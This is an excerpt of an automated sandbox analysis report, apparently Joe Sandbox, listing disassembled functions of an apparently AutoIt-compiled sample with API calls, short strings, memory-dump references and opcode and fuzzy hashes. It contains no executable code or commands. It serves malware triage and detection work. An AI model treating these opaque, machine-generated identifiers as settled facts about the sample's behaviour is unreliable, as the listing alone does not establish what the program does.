                                                                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                        Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _strncmp
                                                                        • String ID: Q\E
                                                                        • API String ID: 909875538-2189900498
                                                                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                        Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 2652923123-3941886329
                                                                        • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                        • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                        Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove_strncmp
                                                                        • String ID: U$\
                                                                        • API String ID: 2666721431-100911408
                                                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                        Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • __wcsnicmp.LIBCMT ref: 00467288
                                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                        • String ID: LPT
                                                                        • API String ID: 3035604524-1350329615
                                                                        • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                        • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                        Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \$h
                                                                        • API String ID: 4104443479-677774858
                                                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                        Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID: &
                                                                        • API String ID: 2931989736-1010288
                                                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                        Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                        Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00466825
                                                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CrackInternet_wcslen
                                                                        • String ID: |
                                                                        • API String ID: 596671847-2343686810
                                                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                        Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                        Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 0040F858
                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                        • _sprintf.LIBCMT ref: 0040F9AE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_sprintf_strlen
                                                                        • String ID: %02X
                                                                        • API String ID: 1921645428-436463671
                                                                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                        Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                        Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                        Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        • Opcode ID: bd2f611461feba52f2bf081b07fd51c1ef0bc70d59738ec4be5fbed0085b6c20
                                                                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                        • Opcode Fuzzy Hash: bd2f611461feba52f2bf081b07fd51c1ef0bc70d59738ec4be5fbed0085b6c20
                                                                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                        Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: htonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 3832099526-2422070025
                                                                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                        Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: InternetOpen
                                                                        • String ID: <local>
                                                                        • API String ID: 2038078732-4266983199
                                                                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
